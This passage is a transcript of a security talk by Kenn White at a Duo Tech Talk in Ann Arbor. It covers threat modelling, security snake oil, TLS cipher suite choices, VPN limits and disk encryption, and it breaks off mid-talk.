Crypto Defenses for Real-World System Threats – Kenn White – Ann Arbor


– All right, if everybody
can wander towards a seat. Don’t be shy, head to the front. Wendy Nather is here, she’s very friendly. Everybody, front row is wide open. Plenty of seats up front guys
if you wanna join us up here. Okay great. Well I wanna first off welcome
everybody to Duo Tech Talks. We have a very special
guest tonight, Kenn White. Really happy to have him here, it’s gonna be a great
talk on real-world threats and crypto-systems and how
to deal with those things. So thank you Kenn for joining us tonight. Thank you all for attending. Thanks to everybody who’s
joined us on the live stream. My name is Mike Hanley I’m the
senior director of security here at Duo. This is Duo Tech Talks, which is our monthly tech talk series. If you’ve been here before in Ann Arbor, generally we have a speaker
come in about once a month, typically on security topics
though we do tend to cover other things that are not
security related as well. And we’ve also hosted Duo Tech
Talks in our other offices in San Mateo, Austin
Texas, and over in London. Before we get started with Kenn’s talk, any announcements, shout-outs,
greets from the audience? Zoe. – Hi, there we go. Hi I’m Zoe and I think you
probably saw the slide up here when we were getting started. But we’re hiring so if
you like this office and you like pizza which is
a frequent appearing item at this office, and you love security, you should check it out because we’re a pretty
great place to work. – Any other shout-outs? – [Man] There’s a healthcare
hackathon coming up in June, June 23rd to 26th. You can find out all about it
if you google A2 health hacks, or they’re on Facebook as well. And they have a monthly,
one more monthly mixer and mini-hack coming up
that’ll be announced as well. – Awesome, thanks Ted. – [Man] Probably all of
you already know about this but A2 New Tech April meeting
is next Tuesday, 6.30. It’s always the third
Tuesday of every month. – Other announcements, shout-outs? Weather forecasts. Okay, all right. Well again thanks everybody for coming. So it’s my pleasure to very
quickly introduce Kenn White. For those of you not
familiar with Kenn’s work, Kenn does a substantial amount
of work in the crypto space and the vast majority for the public good. If you’re not familiar with works like the orchestration of the TrueCrypt
audit from several years ago. People lost confidence in a very sort of foundational piece of open
source security software. Kenn was one of the folks who
stepped in to help make sure that that got audited, and
he’s also current involved in the open SSL audit that’s underway. So lot of exciting work. Kenn’s also done a lot
of other interesting work in consulting and sort
of broad scale impact in the security community so
we couldn’t be more excited to have him joining us here at Duo tonight to talk about crypto defenses
and real-world system threats. So without further ado Kenn, thank you. – Thanks Mike. (applauding) Appreciate it, this is a great turnout. All right so let’s dive in. The, I’ve got quite a
bit of material to cover and we can go kind of as
deep or sort of as high-level as you like and hopefully
we’ll take lots of questions at the end. So this is just sort of the general flow I’d like to kind of follow. Just a tiny bit about me. I’ve got a really weird background. I imagine a lot of people in this room probably have a weird
background for, you know, how you ended up. My formal training’s in
computational modeling and imaging and machine learning
around signal processing and expert systems. When I was doing some graduate work at NIH I got involved in some
safety-critical system work, and then eventually sort
of stumbled my way into the health care space
and clinical research and ended up working on
sort of one of the largest clinical research networks in the world, and owning defense and
operations for that. So that’s, I spent many
many years in the Linux and network world to sort
of get to where I am now. And then more recently,
I do spend a lot of work on applied cryptos, as Mike indicated. If you’re not familiar with it, check out Open Crypto Audit, that’s one of the non-profits
I’ve been involved with and it’s, there’s some
great work we’ve done there. So let’s dive in. So in the world of applied crypto and in security in general. Actually more in terms
of security in general, we are often misunderstood. This was about a year and a half ago. Actually, I guess, it’s
about a year and a half ago. This is Ellen Nakashima,
she’s a pretty well-regarded National Security reporter
for the Washington Post, and she was quoting Director
Comey, and I love this line. So Comey’s line was, “There’s no doubt the use of encryption “is part of terrorist tradecraft now. “It’s a feature especially of
ISIL’s or ISIS’s tradecraft.” To which Matt Blaze
responded, that’s true, Crypto’s also part of consumer tradecraft, business tradecraft and critical
infrastructure tradecraft. (laughing) But we see, you know, we see
these sort of simple narratives kind of repeated quite a bit. I’m not sure if people are familiar with the American Enterprise Institute. It’s a pretty well-regarded,
central maybe, slightly right, slightly left
depending on who you talk to, think tank in DC, but it’s,
they’ve got a really deep bench of respected scholars. This came out a few months ago. Title of the story was How Data
Encryption Helps Terrorists. (laughing) And I couldn’t help myself
but click on that little lock, because if you do click on
that little lock you see your connection to
aei.org is encrypted using modern cipher suite. And it was actually a
pretty decent cipher suite. But so humans are the hard part right. I saw this, I saw this
little snippet a while back and I thought this was beautiful. So this guy’s getting, has
his whole family come in for a Super Bowl party. Like relatives were driving from all over, they were super-excited. And the problem was when
they actually went to use their new DVR and get everything going, it just didn’t work. He had like an entire box of
cables and switches and things and it just didn’t work. So this is what was engineered. On the bottom is a little
playing card deck and a camcorder that’s shooting at an iPad
that’s tied into S-Video cable. (laughing) Those people were able
to watch the Super Bowl. One of the things I’ll talk
about a little bit later is, in terms of formal
methods and verification and formal proofs of security guarantees. The problem is often those
are either very circumscribed or they’re isolated sort of
absent, the larger picture. You can imagine lots of
different security threats. I’m not sure how many of
us would’ve thought of this security threat. (laughing and groaning) Right. So we’re all, you know, we’ve all gone through
the security training and we have, you know, we’re
sort of aware of phishing and we’re really careful about
clicking on suspect links and things, so this was, I
think near the end of last year. IBM, as you can imagine, IBM
Global has a really substantial malware R&D group and they
did this, they did a report on the sort of interesting new
bot, the Bilal Bot malware. Anyway, wrote a whole piece,
you know, analysis on it. In the old days we sort
of focused on signatures and maybe heuristics and, you know, there’s sort of a standard
approach of how you think about adversaries, but it’s basically an
unknown, you know, actor. In this case the author
of that piece of malware was so incensed that IBM got it wrong and in some of the
particular technical details that he was really proud of, he ended up emailing the
lead author of this post, and basically, he became
his own PR Officer, and then he contacted like
a whole bunch of different, you know mainstream, you know Wired and Ars Technica and things. But I mean this is the,
the lead security analyst was getting, you know,
basically PR pitches from the very malware author,
the guy that he wrote. It’s just a different
way of thinking right. (laughing) Yeah right. Well actually, I studied this for an embarrassingly long amount of time. I’ve no idea what mail program that is. This is a screenshot
in the follow-up piece that the guy wrote. I’m like, is that some
Lotus notes, like ancient I, maybe I don’t know, I don’t so. (people talking over each other) Is it? Oh that’s fantastic,
it’s Go Daddy’s web mail. All right. I’ve got a whole thing on
Go Daddy a little bit later. (laughing) All right. So you know, a lot of times
we have really creative people on the marketing product side, but translating security
properties and guarantees and some of the technical
nuance is difficult. There are innocent mistakes and then there’s sort of snake oil. So this is cyberghostvpn.com. The data you send will all be encrypted with 256 bit encryption and
it might take all those years or it might take three
seconds, because it turns out they published their pre-shared keys and their default allows null ciphers and there’s
just a whole series of other problems, so yes it might take to the end of eternity, but probably not. This I saw in a survey. I don’t remember what
the security product was. And I stared at this for
a long time and I thought. How do you not know if you drive a car. And what information
was the security company trying to get to. So this is another product
that I heard a bit about. Brigade point of sale. Their shtick is they
sort of integrate with larger points of sales. So these, you know, the credit
card swipes at retail stores and things, and their whole
thing is that we are the leader in stability and ease of use, and they had this big media story come out and then when you went to
their home page you got error establishing a database connection. Yeah. In their case it was, in
their case it was yes. So, you know, qualifying what things do. What assurances exist and what, what protections are afforded versus what may not be afforded. Sometimes people like Dan
Guido call these anti-features, and I love that phrase, because if you, if a product
talks about NSA proof or hacker proof, some of
these sort of silly, you know, sloganeering terms, those are signals, they’re trust signals. Now they may be in isolation
but usually they cluster with a whole bunch of other
things and so, you know. But anyway, good UI is critical. This is one of the best
examples of UI I’ve ever seen. (laughing) Not only will this kill you, it will hurt the entire
whole time you’re dying. We should all have, you
know, UI that crystal clear. This was a, I thought, a sort
of insightful observation that a lot of times when
we see sort of defects and maybe catastrophic product failures, or sort of embarrassing examples, that it’s not always a
technical problem in fact, in my experience, often
it’s not a technical problem it’s a decision, it’s
an incentive trade-off that someone made, that
a human being made, and often that’s a management decision, which is why when a, I believe
this was New York City, local television station
that had just invested over $10 million in high
definition weather satellite gear and forecasting things, during
a live broadcast we got that. (laughing) Someone at some point
made a decision to not put a GPO policy on, to let that one slide. To you know, to offload the
problem to the contractor, I’m not sure, not good. I’ve got a couple of other examples here in terms of communication, this is great. So what do you think the
instructions read to the bakery for that cake. (laughing) Happy birthday Kilo with
Darth Vader drawn underneath. It’s probably not what
they really intended. The other one, this is
one of my favorites is. Guy goes into a bakery,
has picture, you know, ’cause modern bakeries
have these ink-jet printers that are kinda like icing
jet printers right, and said I’d like the cake to look like this. So they made the cake
look like the USB stick the guy handed. (laughing) Okay. All right. So there are things that happen where we think we have an
understanding of what we call security boundaries or trust boundaries. There is this notion, I suspect it’s not quite as prevalent here
but I see this a lot in the Fortune 500 with
systems people or ops people who make this really strict
delineation between open source and sort of, you know,
commercial or off the shelf you know, proprietary systems. You get this a lot in
like the hardware end, hardware network sort of space. Cisco for example. So I’ve had these conversations
with system administrators where it’s like, no I don’t
deal with open source, I’m, you know, strictly a Cisco guy. Strictly a Cisco guy,
let’s break that down, ’cause on my phone,
when I have a Cisco VPN in your balance statement
you’ve got credits for OpenSSL and libcurl. So you are running
actually lots of software that you may not be aware of. There’s this notion of
supply chain right so, where chips come from,
where processors come from, where maybe different OEM
kind of integrations happen, whether it’s software or hardware. But you know there’s also this notion of a security supply chain and I think, I think we should think
about that more often because even people who have been,
like, really experienced Linux administrators or
assessment people for years, they may not really quite appreciate how many levels of
dependence is in the stack, and things that have been
sort of untouched for years. That’s one of the reasons
that we work with a, the Linux Foundation’s Core
Infrastructure Initiative to work on the open SSL project, but there’s lots of others. Libcurl’s one of the sort
of cornerstone pieces that lives everywhere. And also, you know, people
have this mindset sometimes. I thought this was an interesting thing. If you talk to, so I don’t know
if people are familiar with the Fizz Buzz test. Right so if you’re a
deeply geeky engineer, you know that some companies
use this as sort of a, like an interview question. It’s a simple programming
problem which is, it’s meant to see if you can understand some basic operations of looping
and modulus constructions things like that. Anyway, I’ve heard these
conversations between people that are like, why do real programming versus design or HTML or CSS
or modern DOM development? Okay well this is CSS, straight CSS that can solve the Fizz Buzz,
right it’s turning complete. What, you know, the basics of sort of, skinning
the cosmetic appearance of a page, that’s been
long since bypassed. I mean some of these are
deeply nuanced technical, you know, skillsets. How about this one. This is the bane of web design, or sorry, web application everywhere, right. And by the way, for the record, I’m either crazy enough or
dumb enough to actually have worked on a system that was
JavaScript and DOM based, that did cardiovascular analysis
and so had to worry about things like micro volts and
microseconds on EKG waveforms and things like this which
are crucially different. But let’s talk about threat models. What does that mean exactly, because security people say that a lot. Well the first thing is it
means understand your adversary. Is your adversary the
nuclear sub or the dolphin? How about this one, no chew deterrent. (laughing) This was an example of not
understanding your adversary, at least bad product
design, I’m not sure which. So, in terms of trust signals, a lot of times when we look at
maybe a promising application on mobile or a tablet, you know, people put some degree of faith,
maybe with some skepticism, in the ranking systems online right, which apps are quite popular. I think Apple, when
they first started out. By the way, just historical point, when the iPhone first came
out there was no App Store, so there was a whole lot
of things that you have now that wasn’t on the first
Apple iPhone, excuse me. But when the App Store was put in place, I guarantee you some
really really smart people sat around and thought
about potential threats and vulnerabilities and so forth. But I’m not sure they
thought about this one. So this is a person going through and putting in fake reviews
but from real devices, that have actually been
registered per device, to game the play store, and
we’ve seen similar things with iOS apps. And now let’s talk about users right. Rocks, riptides kill unwary Asian visitors on Australian beaches. Look at that guy on the left. Well we can mitigate that
right, there’s a sign. All right. But these things are trade-offs right so we talk about engineering trade-offs. Sometimes risk is, is worth the reward. In this kid’s case she was going for it. I love that face. So a few months ago there
was an announcement that, I think in the order of 850,000,
900,000 routers in Germany were routed and were forming bot nets, and so when people dove
into it one of the most common home routers, for
cable company in Germany, had, I don’t know if
this was well documented, if this was meant for manufacture
updates, I’m not sure, but basically on a single
post, on a single HTTP post, properly crafted, what was
supposed to be a SOAP envelope, you could just run arbitrary
shell script right. You could just back tick
and run and get a payload, do a drop or bring it down, and so on. But threats vary
tremendously by intent right. Your threat is probably not my threat. My threat is definitely
not the people on the left because I’m never going to
do that, just for the record, I’m not going to jump
out of a plane with them. Let’s talk about snake oil. People know that term in general? Right, so it’s from the, you
know, the days of the wild west you know and people would
sell these potions or linemins or whatever, that were promised to do all kinds of crazy things. We see that a lot in the product security, in the security product space. Justin Schuh from Google
had this fantastic quote which is when I talk to security, to people about security
products, this is a helpful start. I love the helmet too. I mentioned before about trusting signals, trust signals right. If any of you follow me on Twitter, for some reason I’ve sort
of become drawn to, like, you know, like a moth to
light with really bad VPNs and like, you know, really
bad products and things. But part of the thing that
I’ve discovered in seeing how, just how like, a cesspool the consumer VPN service
provider space is, is it finally occurred to me that you can put aside the technical
characteristics or signals, it’s crucially important to understand the business signals too
right, the ethics signals, the trust signals, because if you say, for example, you have battle-tested
military-grade encryption, I’m gonna think of this. I’m not gonna think of this,
and this is actually, probably, the more real threat
when you’re, for example, traveling in a really sketchy hotspot. It’s hard to read this
so I’ll do this kind of from the inside out. My Uber driver was describing
how drivers coordinate to engineer surge prices. Say a big event finishes,
drivers know this, so they shut off in unison. Algorithm respond with a
surge pricing because of an artificial fall in supply,
then drivers turn on the app and snap up the rides at a higher rate. And someone says, you
know, humans are adaptive. Wells Fargo, if you remember
the story from, I think, a year ago or so. Yeah so 5300 employees were
fired for making up accounts. So customers would come in and
they’d just make up accounts and create check in accounts
and create other things without actually bothering to tell people ’cause there’s some
weird sales incentive or compensation incentive or something. Thousands of people did
this for like years. Anyway, the top line is the
most important one which is give humans a system and they’ll
game it, the end, period. Hmm, I like that. Humans will always game the system. We have to think about this in a lot of different ways right. How many of us do worry about
tainted input on web forums or, you know, public facing interfaces, whether it’s an API
endpoint or a, you know, some other kind of web service. Do you blacklist or white list? (laughing) There’s no unicycle rule right. Humans will always game the system. This is what I’ve sort of come to assume that most adversaries do. Some are really sophisticated
and some just break things. I saw this last spring for filing and I thought he was sort of joking right. So Tadhg O’Higgins, with
an apostrophe in his name, says it’s 2016 TurboTax,
you just lost a customer. And he has a little screenshot
of last name O’Higgins, and it says invalid entry. I was like, all right,
so I click on his profile and he really is from Ireland. And I was like it can’t be that bad. So this was like six months
later I went to check. Yeah it’s still bad. So they’re blocking hyphens, and why do you think they
might be blocking hyphens on a web form? Because somebody believes
that somewhere downstream that’s gonna be rendered and
maybe you could do bad things. Maybe you could do cross-site scripting, maybe you could do other
kinds of bad things. That is a terrible,
terrible way to design it, much less to attract customers. And plus it’s futile anyway right. 70 different unique ways to encode the less than symbol in HTML. Maybe you need to work on filters, and templates and data flow
modeling throughout application rather than trying to stop
what could be a, you know, a trivial sort of switch
into a different translation. Let’s talk about history a little bit. So I posted this a few months ago. This is one of the
stranger things I’ve seen. Now if you’ve been playing
in the network world or you know your BSD history you know that one of the few remote, remote exploits for open BSD was in their
IPP6 implementation. This is below TCP UDP,
this is layer three. So just having a server,
no open socks needed, you can exploit it. But I’m not talking about open BSD, I’m talking about an
internet of things embedded piece of hardware that
made the same mistake about 10 years later, right. So this is latest, greatest, you order it, these are tiny little
embedded crypto chips and hardware chips they have embedded. You know, purpose built network stacks. Purpose built operating systems. This is the most fundamental
basic level of, you know, part of the stack, and
this vendor was basically reinventing the wheel in
terms of its vulnerability from, yeah, 2007. Let’s talk about Windows
because, by the way, this isn’t in any way meant to
slam sort of the Linux family or, you know, heritage or whatever. You see this about once
every year and a half or so. If the phrase in a patch
Tuesday uses the phrase, all versions of Windows,
there’s always almost something interesting going on. So this example is what
a sophisticated attacker would have to do to exploit
this particular one. This was a media file extension
that went all the way back to I think, I’m not sure
if it was Windows 98, but definitely Windows 2000, and basically a single text line, call that and you can run, you know, local privileged executables,
but through a webpage. Ouch. There are dependencies
and there’s core code and there’s sort of, you know, critical well-established
but kind of uninspected, unlooked at, sort of ignored pieces in all these operating systems. Let’s talk about deserialization. If you’re into a Wasp, or
you’re a CISSE type person, this is probably second,
you know, old hat, so deserialization is the way in which applications will take streams of data and basically parse them and use them. The problem is there
are many many examples. ORACLE quarterly puts out
around 180, 200 remote exploits every quarter, like clockwork, across their whole product suite because somewhere in the Java stack, there’s unfiltered, what was
assumed to be, trusted data, which is actually used to execute code. This is just a tiny sample of the, some of the products involved. On the commercial side, I mean this is, this is the Fortune 500, and this is the gift that keeps on giving because it’s not like, you know, it’s not like people are gonna
rip out their payroll systems or rip out their SAP implementations. These are fundamental difficult problems which require really
different way kind of thinking in terms of public facing pieces. As I said, they’re everywhere. Now you might be saying all right well, I love this expression
it’s a Polish idiom, not my circus, not my monkey. You might be saying well
that’s not my problem, I’m a actual security engineer, I’m an actual, you know, developer. I, you know, that’s fine,
but we don’t, you know, we don’t deal with these. But you should be thinking
about it because a lot of times this expression they
teach in medical school, to first year medical students. If you hear hoof beats, maybe
you should think of horses instead of zebras, right. The, the post-mortems on 100 different, engagements from Praetorian, and this was done like a year ago I think. These aren’t super sophisticated right. These, some of these date
back to the 90s in terms of vulnerabilities in the systems. You know like, all right. Let’s get onto the crypto, what does this have to do with crypto? One of the things it has
to do with crypto is, crypto is one small part of a tool. It’s one tactic that can be used in a larger understanding of threats in different adversarial spaces. But crypto is a little special. So Maciej Ceglowski, I don’t
know if you guys know Pinboard, it’s like a book-marking
site, anyway he’s a really, this is the guy that founded,
sort of a pretty well-known kind of internet
celebrity for his writing. This is a, this is one of the best quotes I’ve ever read on crypto. He’s talking about the
Matasano CryptoPals Challenge. So if you’re not familiar
this was something that Thomas Ptcaek and a
couple of other people, while they were at Matasamo, put together, and it’s like, it’s like
an increasingly difficult series of problems. It’s, they’re open to the
world, anybody can try it, even if you have no
background in programming, or even if you, you know, maybe you’re really skilled in
Python or Java or something, it’s a great excuse to
like learn a new language. So it starts out, here’s a line from a, I think it’s a Vanilla
Ice rap song or something. Like here’s just a simple
sentence encoded in Base64. Here’s a simple sentence,
convert it to, you know, perform a hash on it. Like very basic simple things, and it kind of advances to, manipulating things and
doing padding oracle attacks, and interesting, you know, other
kind of attacks and things. But you sort of
progressively build up to it. Anyway, as he’s working through this, this is his write-up
on that sort of journey that he went through, there’s no difference from
the attacker’s point of view between gross and tiny errors. Both of them are equally exploitable. In at least three of the challenges, the mere fact of getting
distinguishable error messages was enough to recover the entire message. In other words to break the entire crypto. This lesson is very hard to internalize. In the real world, if
you build a book shelf and forget to tighten one
of the screws all the way it does not burn down your house. Absolutely true and we
see this all the time with some of the incremental
changes that have happened with SSL, and we’ll get
into that in just a second. All right so let’s kinda dive in. I’ve got a map, a few slides
back and folks are welcome to pull that from GitHub. It’s a, you know, it’s a pretty decent vector map that you can
like zoom in and stuff. These are kind of ways that
I’ve been thinking about modern crypto defenses, sort
of broad categories right so. We worry and think about ways to protect data coming across the network. We think about how we can
protect disk and volume. We worry about how we can protect files. How about memory encryption? How about data and use encryption and hardware security modules,
so let’s dive into that. And I’ll spend a fair
amount of time on this. I imagine as crypto goes, that network transport
is probably something that people care about a lot. It’s certainly something I’ve
been focusing on quite a bit. SSL, TLS, Ipsec, VPNs, SSH, these are common, you know,
tools and protocols that we use all the time. What are some of the guarantees, what are some of the
properties of these things? Well data exposure
right, network intercept, credential theft,
identity theft and so on. The compliance is also
worth thinking about. I used to think compliance
in sort of a different way. I actually think of as an adversary now because if you’ve done audits and kind of real world inspections, a lot of times you’ll see organizations, you’ll see this in the government, you see it in sort of larger, excuse me, Fortune 500 companies. It’s as if there’s a checklist mentality. It’s as if the, meeting the
compliance by itself is enough when I think hopefully
everybody in the room knows that what the real goal is,
is actual security right, is to keep the bad guys out
and keep customer data safe. But, so in that sense, I
think of as an adversary because there are things that sometimes you’re required to do, that may not make sense and
so we’ll talk about that in a second. This is a map of Internet
Explorer, Firefox and Chrome, common route certificate authorities. And the sort of literal web of trust among
those that are kind of defaults, that are installed in modern browsers. I’ll get back to this
in just a second but, bracket that for a second. Did you know that, so when
you saw Ubuntu, for example, one of the defaults is
localhost.localdomain, right. I mean it’s a very common
thing if you’ve installed VMs before. There’s an entire top level
global domain called .host. I registered localdomain.host. You can, in one of the
attacks that we’ve seen, there are variations with,
what are they called, homomorphic attacks where, like Gmail, but with a Cyrillic I,
or Google service account or something with, like,
you know, a slightly off, you know, a different character base. That’s kinda weird. So I’m not sure if people
followed the WoSign story a while ago. This was a few months back. WoSign is a major civic authority, it was trusted by your
Android, your iPhone, all the modern operating systems. They issued bogus certificates
for GitHub and for, I think, the University of California, and I think a couple of others. And when people went to sort of do the investigation on how some of
these certificates were issued, it lead to this whole
chain of kind of like a comedy of errors, to the
point where they were actually pulled from the root stores
from some of the major browsers. It’s sort of the nuclear
option if your business is you know, certificate authorities. Ivan Ristic, if you know the OpenSSL, or sorry the SSL labs test,
this is a great model. We’ll have links afterwards
but this is sort of his view of kind of the threat
architecture and threat map for SSL and some of the
properties that’s guaranteed. Let’s talk about integrity. We’ve seen a lot of stories
with funky names right, like FREAK and POODLE and
some of these other things that have made the headlines. One of the things that we’ve discovered over the last several years is
that some of our assumptions about the way that block encryption works, for example, over the web with HPS, TLS, were naive, because I
think people know this but just to reiterate. AES, for example, it
doesn’t encrypt files right. It doesn’t encrypt any
sizeable amount of data. It encrypts a few bytes at a
time and so any implementation has to take, whether it’s
short string or long string, a binary stream, a file, whatever
it is, and put in chunks, and block these together,
deal with padding, maybe deal with compression, and do it in such a way
that the receiver, you know, can make sense of it. There’s been a whole history with unauthenticated block modes. So this is another reason why if you, if you actually think
about what things mean. So when you see product
literature that talks about we have AES at 256 bit security level, it’s kinda like saying you have a V6 and so your car has to be great. Has nothing to do with whether
your car’s great or not, it’s one tiny element
which can be screwed up in a whole lot of different ways. There’s a, there’s a
project called ZeroDB. It’s supposed to be, it’s a way of somewhere between tokenizing and property preserving encryption that made a lot of interesting promises. They sort of held back
for like a year and a half after they launched before
opening up to, you know, the source code. And when they did, I think
within the first 24 hours or so, this was a thread on Reddit, someone took a look and
said, this is really broken. This is broken because you’re not using authenticated blocks, which means, if your cookie says, for example, Username Bob, Admin
zero, I can literally do a really simple XOR and change
your cookie to Admin=1, or my cookie to Admin=1. That’s a problem. We can’t talk about,
there’s not time to sort of get into all the different
implementations of, sort of, modern cipher suites, but
let’s spend a second on these. So when I think, in my mind,
about real-world endpoint TLS, it’s this, it’s sort of the DevOps folks. Like what is, what are the
actual, you know, environments, platforms, tools, that
we’re talking about. Web servers, proxy, we’re seeing
more systems written in Go. Excuse me. Elastic load balance with
AWS, CloudFront and so on. And global CDN’s. Has anyone, just roughly by show of hands, configured an SSL webserver before? Some of these look familiar? Anybody get this feeling that like there’s an unbelievable amount of too many options that you have no idea
what any of them mean? You’re not alone. There are people who talk about crypto flexibility or,
there’s a way to confuse modularity which in general,
with systems and programming, is a good thing right,
as we’re all taught, but with unnecessary
and dangerous options. So right now you’re probably
not gonna see a few of these. And by the way, Twofish and Blowfish. Blowfish is, it doesn’t
really apply to TLS, it is an option for
VPNs but I’ve seen some bizarre, bespoke atrocities
in PHP and other things that were done with
Blowfish to like sort of a homemade TLS and you can
call anything, you know, any acronym you want,
I guess, but so that’s, that really is more
applicable to VPNs but. So let’s assume that in 2017 we’re not talking about SSL anymore. I use SSL by the way as a, as sort of a catch-all and a, you know, pedantic person would say
well, that’s not really true. There, we came like this close
to naming TLS 1.3, SSL 4. So if you really want to get pedantic I’m happy to sit with you
for a few cold beverages and have that conversation. Triple DES and RC4, totally broken right. Even two years ago, myself, Red Hat, I mean, lots of people and
organizations were still saying, you know, this is a hanger-on. These are pieces of
encryption, cipher suites, that we need to use for XP,
for older Android and so forth. In 2017, that’s not so true. But here’s some things
that you may not know. RSA is deprecated. Not RSA certificates, those
are gonna be with us for, till my grandkids come round I think. But RSA handshakes. You may be thinking you’re
crazy that’s RSA, like what. No, there are now I
think in the 19th draft, we’ll see it in a second,
the new TLS standard, RSA not allowed, just not
allowed as a handshake. And in fact even
Diffie-Hellman is deprecated. What? Well static Diffie-Hellman not ephemeral, curved Diffie-Hellman. CBC, CBC is probably 60% of, you know, or more of the world’s, you
know, network block mode chain. Or sorry block mode. No. CBC’s a problem. CBC’s been a problem for many many years. If some of these names look familiar, Beast, Crime Time, Breach,
Lucky 13, and so forth, it’s because we’ve been
monkey-patching a lot of things but fundamentally the way
in which you construct more than just a few bytes at a time, even some of the best in
the business get it wrong and have gotten it wrong, and every major operating
system, and every mobile carrier, and every big network company
gets it wrong, and has, to the point where the, the defaults and what were
allowed in SSL 3 for example, we just said you can’t,
SSL 3 is deprecated, you can’t use it. How about Triple DES and Blowfish? Yeah, they’re broken. This was, I think, four
or five months ago right, the Sweet32 attack. That said, there are some caveats right. This is probably not your biggest problem. This is a quote from the Sweet32 team. So we show the network
attacker who can monitor a long-lived Triple DES HTTPS connection between a web browser and
a web site can recover secure cookies by
capturing around, how many? 785 gigabytes of JavaScript traffic. Now if you’ve got one
attacker that’s hitting your web server with
785 gigabytes of traffic to recover a cookie, I would hope you’d block
them before they got into the terabyte level. But that’s probably not, probably
not really your adversary. But the game is rigged right
’cause how do you know. And good data hard. This is the Verizon data
breach investigation report from last year. It’s, I think, generally
considered like, you know, really well-respected, you know, credible source of industry information. One of their top 10 exploits
was FREAK, so they claim. This is a quote by, from Dan
Guido at Trail of Bits lab, and it’s true, what happened was, between some of the
research down the street at the University of Michigan, and basic ancient network gear, they were getting false positives. False positives so much
so that they were listing one of these fairly esoteric,
if we’ll say attacks, as one of the top 10 that
companies were encountering, that’s not true. Anyway back to, back to our TLS stack. Right so, in addition to the protocol and
the cipher the key exchange, how we look at integrity, the
modes and the certificates, there’s a whole host, I’ve
got like four of these here, there’s maybe eight, nine other kind of extensions enhancements
to the TLS protocols that have kind of come along. You’re gonna see, be seeing
more and more about it I think. People are starting to think about, and we’re seeing more
implementations of native pinning on HT, HP, KP pinning. The ideas that, for example,
when Facebook or Gmail or you know, like a major
web property or application, wants to make a secure connection, it’s not just any certificate,
it’s tied and fingerprinted to that certificate that they’ve issued. And it’s really powerful. I’m not gonna get into
it now but there’s like a day or two ago on Twitter
I posted about, I don’t know, half a dozen different man in the middles, at airports, a lot of them
in the, in central Asia, and a lot of them at like myriads and other hotpots and things. And it’s a problem because
even on like Gogo wifi, they were generating, in real-time, Google certificates,
calling it Google.com, but they didn’t do a great
job and it was kinda broken and they happened to hit
one of Google Chrome’s senior engineering people
who, on a plane ride, said wait why is Gogo com
issuing a Google certificate. So anyway, there’s a whole
sort of ecosystem of people, thinking about ways to kind
of bring these together and enhance the security posture. TLS 1.0, there are mitigations
we can do on browser side, but I mean, I think going
forward we sort of have to consider that kind of gone, unless you really, really
have to support, you know, developing areas where XP
and like Android 2.0 clients are still around, that’s just gone. Yeah, so if you were building a new stack, if you’re building a new application, designing mobile endpoints,
this is a practical matter. There are infinite number of
other primitive constructions that you could use but in terms of Schannel with Microsoft,
in terms of AWS’s endpoint, in terms of iOS, Core Crypto, and so on, this is kind of what you’ve got right now. It’s not great, our options
are kind of limited. As I said the TLS 1.3 draft
19, was just published. I think it’s pretty much done. There may be some tweaking
but I think we’re, we’re pretty close. Here are a few things, just
some top-level highlights. You must implement GCM, AES, which is an Authenticated Cipher Suite. You should implement, among
others, the ChaCha Poly. So ChaCha is an alternative to AES, which is dramatically faster,
even on similar hardware. A lot of smaller devices don’t have decent AES acceleration hardware,
and so it’s really useful in that case, in the Poly1305 construct. Must support digital signatures, meaning elliptic curve DSA
and traditional RSA certs. You have to support the NIST,
at least one of those curves, the P-256, and then the 25519. So point-in-time kind of advice, ’cause these things are moving right. Prefer forward secret
authenticated encryption with associated data, ahead of others. If possible explicitly
declare server cipher suites versus wildcards. You see a lot of times in,
in stack overflow and blogs, and things, this is directed
towards the DevOps folks, where you sort of say like
exclamation point, RC4, or wildcards which kind of
give you this whole universe of possible constructions. That’s not recommended. It’s recommended to explicitly
describe, for example, some of those suites. As I said, CBC should be
one of the last trusted, in terms of server preference order. Right. So just a little more fill there. If you’ve seen some of
the strings on the bottom. TLS, ECDHE, blah blah
blah, this is more for some of the ops folks that
have struggled with this ’cause if you’ve stared at it for years but you’ve never really quite understood, like what different pieces are, I’ve got some links to the
FBN, which will, I think, make this hopefully more
sane and more predictable. And it literally, with these five suites, depending whether you’re using
a DSA or RSA certificate, that’s it. You could support 99.9%
of the modern and slightly crufty web right now with those. Not some giant sort of thing. If you want the giant thing
or your eyes have already glazed over like five minutes ago, just go to Mozilla’s SSL
generator and read the docs. Let’s talk about VPNs. (laughing) I get this all the time, that VPNs, because of some of the
marketing and things, you know, this is how you get anonymity, this is how you get privacy,
no no no no no no no. What you get is, you’re at a hotspot and you trust not the guy next to you or at a hotel and someone three rooms down who likes to download lots of
free screensavers or whatever and like is a walking
malware lab and, you know, you don’t want that. A lot of VPNs, by the way,
and I’ll say this too, don’t just walk, run
from any free VPN service because it’s almost guaranteed
you’re gonna be part of a bot mesh network and
you’re the product for that. But anyway in terms of the
commercial service providers, these are really hard things
to do, to run that scale, proxies with, you know, fairly
complicated network set-ups, and we’ve seen repeatedly
where you’re not only trusting the endpoint, their
virtual server in Germany or Switzerland or wherever, you’ve opened up your internal interface. So that means 150 people that
are on that particular node, they’re seeing your inside home network. It’s dual-homed, it’s dual-bridged. Like that’s how broken
some of these things are. So what do VPNs actually provide? They’re just shifting the trust endpoint. They may provide, if
they’re done properly, confidentiality via encryption,
but for what it’s worth, about one in six Android
VPNs, they don’t even encrypt. They don’t encrypt. I’ve got a link at the bottom
there’s a research study that came out a couple of months ago. It’s a disaster. They do not guarantee
anonymity and privacy with this caveat right. I suppose, in isolation,
if you have a clean, you’ve paid with Bitcoin
or cash at Best Buy, and you weren’t on camera and, you know, you trust that laptop and
you do all this stuff. And that’s it and you go to like one site. Yeah, you have some properties of this. But nobody does that right. Nobody does that. They turn the VPN on, they forget about it and then they log into
Facebook and Twitter and Instagram and right. All right so enough of the mini-rant. Let’s go onto some other crypto defenses in terms of disk and volume. Why do you care? Why would you care about
locking these things down. If we’re not talking about laptops, well actually let’s talk
about laptops for a second. If you, one of the best use
cases for disk encryption, for whole volume encryption, is laptops, because if you’ve got PII,
you’ve got HIPAA covered data, you leave your laptop in a cab, that’s an awkward conversation
with your IT folks, and a new laptop and then you’re done. If it’s not encrypted, that might be Office of Civil Rights, with HHS, and a multi-million dollar problem. So flip on, flip on full disk encryption. But putting the laptop piece aside, let’s talk about servers. Let’s talk about points of service. I don’t know if you guys know this, this Marco Arment, he created Instapaper. He was one of the, I think
the original founder, one of the CTOs of Tumblr. This was like a year and
